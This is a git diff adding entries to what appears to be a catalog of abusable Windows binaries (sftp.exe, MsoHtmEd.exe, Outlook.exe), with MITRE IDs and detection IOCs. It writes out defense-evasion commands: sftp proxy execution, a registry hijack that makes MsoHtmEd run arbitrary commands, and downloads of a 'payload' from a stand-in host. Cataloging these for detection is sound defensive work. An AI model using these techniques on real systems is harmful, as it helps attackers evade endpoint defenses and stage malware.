diff --git a/yml/OSBinaries/sftp.yml b/yml/OSBinaries/sftp.yml new file mode 100644 index 00000000..7159022b --- /dev/null +++ b/yml/OSBinaries/sftp.yml @@ -0,0 +1,35 @@ +--- +Name: sftp.exe +Description: SSH File Transfer Protocol +Author: Nir Chako +Created: 2022-11-06 +Commands: + - Command: "sftp -D c:\\windows\\system32\\notepad.exe" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost" + Description: Execute notepad.exe with sftp.exe as parent process + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 + - Command: "sftp @: " + Description: Download file with sftp.exe from an FTP server + Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session. + Category: Download + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: c:\windows\system32\OpenSSH\sftp.exe +Detection: + - IOC: sftp.exe spawning unexpected processes + - IOC: Suspicious sFTP internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index fb2ac30b..6f2fdd0c 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -4,6 +4,13 @@ Description: Microsoft Office component Author: Nir Chako Created: 2022-07-24 Commands: + - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com + Description: Execute a command line from the registry + Usecase: Set this registry key with the desired commaned you want to trigger (this example executes calc.exe) - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe" + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 - Command: MsoHtmEd.exe https://example.com/payload Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml new file mode 100644 index 00000000..a7efcf35 --- /dev/null +++ b/yml/OtherMSBinaries/Outlook.yml @@ -0,0 +1,34 @@ +--- +Name: Outlook.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-11-08 +Commands: + - Command: Outlook.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe + - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0'